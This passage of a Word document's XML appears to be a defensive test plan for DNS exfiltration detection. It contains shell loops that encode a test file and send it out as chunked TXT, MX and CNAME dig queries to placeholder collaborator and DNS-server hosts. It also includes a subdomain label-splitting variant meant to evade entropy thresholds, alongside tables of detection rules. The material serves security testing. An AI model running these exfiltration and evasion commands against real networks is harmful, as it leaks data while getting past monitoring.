        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B4BF41" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A071E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098FCFF6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TXT Record Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29BD79"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7556B221"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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>while read chunk; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCA0D7"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TXT "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB30D88"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3-8 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AE170"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75476704" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4802DB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MX Record Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A275E2"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B912F47"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7BCF77E7"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MX "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137D333"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3-8 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE3627"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77603BD9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E4F130" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CNAME Record Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070593EF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cat exfil_test.txt | base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08F4F6"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7EAA89F5"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CNAME "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B814C"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3-8 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C4634"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07BE3400" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DDA843" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rule Required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B2212" w14:paraId="6C2B81F4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="208CD807" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5648352C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="2B2CAE67" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7475DEA5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C2553FE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E05a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F1415E9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>All-record-type inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60994EEE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Entropy and accumulation rules apply to ALL query types, not just A/AAAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="47F14DF6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="68EB4624" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E05b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="24EEC9FE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Record type anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="77C7D2DD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Endpoint generating unusual TXT/MX/CNAME volume vs. its baseline → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F48C2F1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756B5297" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8D7DA"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>⛔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMPORTANT: </w:t>
      </w:r>
      <w:r>
        <w:t>Critical question for the vendor: 'Do your detection rules inspect the subdomain label on all query types, or only A records?' Many tools miss this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C7027" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C776767" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Phase 3 — Advanced Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36304450" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>6.1 Scenario 6: Subdomain Label Splitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B992C4"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B2212" w14:paraId="3D062F46" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="0E406404" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="574995D7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="12F3F065" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="315065ED" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7462F23C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="59DA4433" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="335A0B43" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="206EE880" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5B9F0473" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2577403B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AE7D9E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Splits payload across multiple subdomain levels to reduce per-label entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5E09CBA6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E7A9D18" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Subdomain Depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="40E9A272" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4 levels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38D69026" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A64CA6A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B5F85C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A FQDN like a.b.c.attacker.com has three subdomain labels (a, b, c). Instead of putting 50 characters of encoded data in one label, the attacker splits it across four shorter labels (e.g., 30 chars each across four levels). Each individual label has lower </w:t>
      </w:r>
      <w:r>
        <w:t>entropy because it is shorter, potentially falling under per-label entropy thresholds. But the concatenated payload across all labels is identical to a single-label exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05AF93" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742D5F2F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9848A"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base32 | tr -d '=\n' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E5C5B"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tr '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>upper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:]' '[:lower:]' | fold -w 90 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3639C7B5"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61AF2A84"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l1=$(echo "$chunk" | cut -c1-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF055D"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l2=$(echo "$chunk" | cut -c24-46)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D7A7B"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l3=$(echo "$chunk" | cut -c47-69)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D09547"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l4=$(echo "$chunk" | cut -c70-90)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBA167"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+short "${l1</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{l2}.${l3}.${l4}.COLLAB" @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456BD9BD"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5-15 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D0219"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1D965C24" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C598980" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rules Required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B2212" w14:paraId="37F645FC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="01FCC4BA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5913C326" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="66326FC2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5C683668" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DE7AC96" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E06a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BD4E0BE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Subdomain depth anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70BEA260" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;3 subdomain levels to external domain + combined label entropy &gt;3.0 → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="472EF8AA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
